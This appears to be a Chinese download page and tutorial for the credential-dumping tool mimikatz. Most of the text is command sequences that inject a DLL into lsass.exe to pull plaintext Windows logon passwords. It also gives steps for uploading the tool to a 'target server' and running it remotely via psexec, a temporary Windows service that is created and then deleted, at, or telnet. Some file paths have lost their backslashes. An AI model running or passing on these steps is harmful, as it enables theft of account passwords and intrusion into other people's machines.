Dq
B

分类导航

mimikatz 

大小:215KB更新:2014-04-17
类别:加密解密系统:XP/Win7/Win8/Vista

软件介绍

昨天弄了下OphCrack,一个破解windows密码的玩意,顺带想起了这个神器,mimikatz,本人首创中文译名为:咪咪卡住,不要笑,这是很严肃的名字。

mimikat是一个法国人写的轻量级调试器,因为牛逼,所以成了神器。神器之所以出名了,是因为神器可以直接从 lsass.exe 里获取windows处于active状态账号明文密码,是很强大的。下面看看从我的Win7 64位上面抓密码。
进入咪咪卡住的目录,管理员身份运行:

1
//开始运行神器
2
mimikatz
3
//提升权限
4
privilege::debug
5
//注入dll
6
inject::process lsass.exe sekurlsa.dll
7
//抓取密码
8
@getLogonPasswords

不管密码多么复杂都能抓出来

作者的回答的原因是,在llsass中,明文密码经过加密算法的密文 (这个加密算法是可逆的 能被解密出明文)

这个咪咪卡住啦,支持

1
Windows XP (部分可以)
2
Windows Server 2003
3
Windows Server 2008
4
Windows Vista
5
Windows 7
6
Windows 7 SP1
远程终端(3389、mstsc.exe)、虚拟桌面中抓取密码的方法:

通常你在远程终端中运行该程序会提示:存储空间不足,无法处理此命令。

这是因为在终端模式下,不能插入远线程,跨会话不能注入,你需要使用如下方法执行该程序:

首先提取几个文件,只抓取密码的话,只需要这几个文件:

1
mimikatz_trunk oolsPsExec.exe
2
mimikatz_trunkWin32mimikatz.exe
3
mimikatz_trunkWin32sekurlsa.dll
打包后上传至目标服务器,然后解压释放,注意路径中绝对不能有中文(可以有空格)!否则加载DLL的时候会报错:找不到文件。

然后使用以下任何一种方法即可抓取密码:

1
//最简单实用的方法,使用 PsExec.exe 启动。
2
//在系统帐户中运行 cmd.exe,或者直接运行 mimikatz.exe
3
psexec -s cmd.exe
4
//启动 mimikatz.exe
5
C:mimikatz_trunkWin32mimikatz.exe
6
//提升权限
7
privilege::debug
8
//注入dll,要用绝对路径!并且路径中绝对不能有中文(可以有空格)!
9
inject::process lsass.exe "C:mimikatz_trunkWin32sekurlsa.dll"
10
//抓取密码
11
@getLogonPasswords
12
//退出,不要用 ctrl + c,会导致 mimikatz.exe CPU 占用达到 100%,死循环。
13
exit
14
 
15
//*********************************************************
16
 
17
//使用 At 启动
18
at ***
19
 
20
//*********************************************************
21
 
22
//创建服务方法
23
sc create getpassword binpath= "cmd.exe /c c:xxxmimikatz.exe < command.txt > password.txt"
24
sc start getpassword
25
sc delete getpassword
26
 
27
//*********************************************************
28
 
29
//telnet 远程命令管道
30
telnet ****

相关推荐